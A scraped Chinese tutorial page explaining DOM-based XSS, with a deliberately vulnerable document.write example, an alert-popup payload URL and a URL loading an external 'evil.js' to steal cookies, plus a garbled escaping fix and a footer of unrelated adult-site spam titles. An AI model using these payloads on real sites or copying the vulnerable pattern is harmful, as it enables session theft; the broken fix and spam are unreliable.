<span id="mktg5"></span>

<i id="mktg5"><meter id="mktg5"></meter></i>

        <label id="mktg5"><meter id="mktg5"></meter></label>
        最新文章專題視頻專題問答1問答10問答100問答1000問答2000關鍵字專題1關鍵字專題50關鍵字專題500關鍵字專題1500TAG最新視頻文章推薦1 推薦3 推薦5 推薦7 推薦9 推薦11 推薦13 推薦15 推薦17 推薦19 推薦21 推薦23 推薦25 推薦27 推薦29 推薦31 推薦33 推薦35 推薦37視頻文章20視頻文章30視頻文章40視頻文章50視頻文章60 視頻文章70視頻文章80視頻文章90視頻文章100視頻文章120視頻文章140 視頻2關鍵字專題關鍵字專題tag2tag3文章專題文章專題2文章索引1文章索引2文章索引3文章索引4文章索引5123456789101112131415文章專題3
        問答文章1 問答文章501 問答文章1001 問答文章1501 問答文章2001 問答文章2501 問答文章3001 問答文章3501 問答文章4001 問答文章4501 問答文章5001 問答文章5501 問答文章6001 問答文章6501 問答文章7001 問答文章7501 問答文章8001 問答文章8501 問答文章9001 問答文章9501
        當前位置: 首頁 - 科技 - 知識百科 - 正文

        js中xss跨站腳本攻擊的簡單理解

        來源:懂視網 責編:小采 時間:2020-11-27 19:32:54
        文檔

        js中xss跨站腳本攻擊的簡單理解

        js中xss跨站腳本攻擊的簡單理解:跨站腳本,稱為xss這個術語用來表示一類的安全問題,指攻擊者向目標web站點注入html標簽或者腳本。來一個小栗子 substring 返回介于兩者之間的字符串,如果省去最后一個參數,則直接以length為填充window.location.search 返回/后面內容包括問號返回
        推薦度:
        導讀js中xss跨站腳本攻擊的簡單理解:跨站腳本,稱為xss這個術語用來表示一類的安全問題,指攻擊者向目標web站點注入html標簽或者腳本。來一個小栗子 substring 返回介于兩者之間的字符串,如果省去最后一個參數,則直接以length為填充window.location.search 返回/后面內容包括問號返回

        <!doctype html>
        <html>
        <head>
         <title>這是標題</title>
         <meta charset="utf-8">
        </head>
        <body>
         <script>
         var name = decodeURIComponent(window.location.search.substring(1)); // 獲取參數
         console.log(name);
         document.write("hello " + name);
         </script>
        </body>
        </html>

        訪問

        http://abc.com:8887/?%20word
        本地使用web server for chrome 完成了本地靜態服務器的搭建,使用host文件,強制修改home.abc.com 以及 abc.com 到 127.0.0.1 完成域名的綁定,因為js腳本不能本地運行,因為有跨域的限制

        頁面輸出

         hello word

        這是一個灰常正經的頁面。
        下面如果嘗試輸入

        http://abc.com:8887/?%3Cscript%3Ealert("David")%3C/script

        事實上現在的瀏覽器很智能了。已經自動解析了。已經自動暫停解析了,最后加上%3e被瀏覽器攔截,自動的,去掉以后,由于容錯機制,自動生成
        好吧,要不是這容錯機制,xss還沒法實驗呢。無奈,現在太智能了,小白的手法,已經不行嘍

        <script>
        </script>

        導致能允許。好吧,去掉自動攔截,chrome直接禁止訪問了。╮(╯▽╰)╭
        使用的是預解析,自動平衡樹

        此時script變身成為

        document.write('hello ' + <script>alert("David")</script)

        好啦,接著,就會出現一個彈窗,David
        因為使用這個url自動生成一個另外一個腳本,由于瀏覽器自動的安全措施,所以使用瀏覽器頁面預解析,寫一個不平衡的樹,初始瀏覽器解析的時候自動添加上

        <script>
        </script>
        事實上,現在基本上都會屏蔽掉的,和sql注入一樣,都是非常小白的攻擊手法。╮(╯▽╰)╭

        導致出現彈窗,xss完成
        接著下面還有
        使用src引入一個腳本。

        http://abc.com:8887/?%3Cscript%20src=%E2%80%9Chttps://1.com/evil.js%E2%80%9D%3E%3C/script%3E

        這樣就完成了一次腳本的注入。會將其他站點的腳本,通過連接進行注入。
        可以對該站點的內容做任何的操作,以及讀取cookie,以及將數據發送回站點

        事實上瀏覽器插件就是這樣干的,在頁面中加入js腳本,通過更改頁面的js來達到對頁面修改的目的

        預防

        通過使用replace()全部替換為實體即可。

        name = name.replace(/</g, "<"),replace(/>/g, ">");

        總結

        xss和sql注入一樣,屬于小白攻擊法,要說簡單也很簡單,要說難也很難

        拒絕服務攻擊

        如果一個站點無限彈窗,瀏覽器會卡死。包括使用js挖礦什么的,都不值得一提了。

        相關文章:

        利用PHP編程防范XSS跨站腳本攻擊

        如何利用php防止XSS跨站腳本攻擊

        聲明:本網頁內容旨在傳播知識,若有侵權等問題請及時與本網聯系,我們將在第一時間刪除處理。TEL:177 7030 7066 E-MAIL:11247931@qq.com

        文檔

        js中xss跨站腳本攻擊的簡單理解

        js中xss跨站腳本攻擊的簡單理解:跨站腳本,稱為xss這個術語用來表示一類的安全問題,指攻擊者向目標web站點注入html標簽或者腳本。來一個小栗子 substring 返回介于兩者之間的字符串,如果省去最后一個參數,則直接以length為填充window.location.search 返回/后面內容包括問號返回
        推薦度:
        標簽: 里面的 簡單 js
        • 熱門焦點

        最新推薦

        猜你喜歡

        熱門推薦

        專題
        Top
        主站蜘蛛池模板: 久久久久免费精品国产小说| 亚洲欧美综合精品成人导航| 99视频免费在线观看| 久久精品国产亚洲AV不卡| 天堂亚洲免费视频| 亚洲男人av香蕉爽爽爽爽| 视频免费1区二区三区| 亚洲中文字幕成人在线| 国产免费久久精品99久久| 亚洲伊人久久精品影院| 久久久精品午夜免费不卡| 亚洲欧洲在线观看| 在线视频免费观看爽爽爽| 亚洲а∨天堂久久精品9966| 成人免费视频国产| 一级毛片高清免费播放| 亚洲午夜久久久久妓女影院| 久久狠狠躁免费观看| 亚洲国语在线视频手机在线| 久久久www成人免费毛片| 国产亚洲视频在线观看| 国产亚洲成av人片在线观看| 午夜免费啪视频在线观看| 亚洲制服丝袜精品久久| 国产免费131美女视频| 国产性生大片免费观看性| 亚洲性一级理论片在线观看| 超pen个人视频国产免费观看| 日韩精品无码免费视频| 久久精品亚洲视频| 国内精品免费视频自在线| 国产高清对白在线观看免费91 | 99国产精品免费观看视频| 亚洲一区二区三区不卡在线播放| 免费大香伊蕉在人线国产| 免费看男人j放进女人j免费看| 亚洲中文无码永久免| 亚洲人成图片小说网站| 一级女人18毛片免费| 国产精品成人69XXX免费视频| 亚洲成a人片在线网站|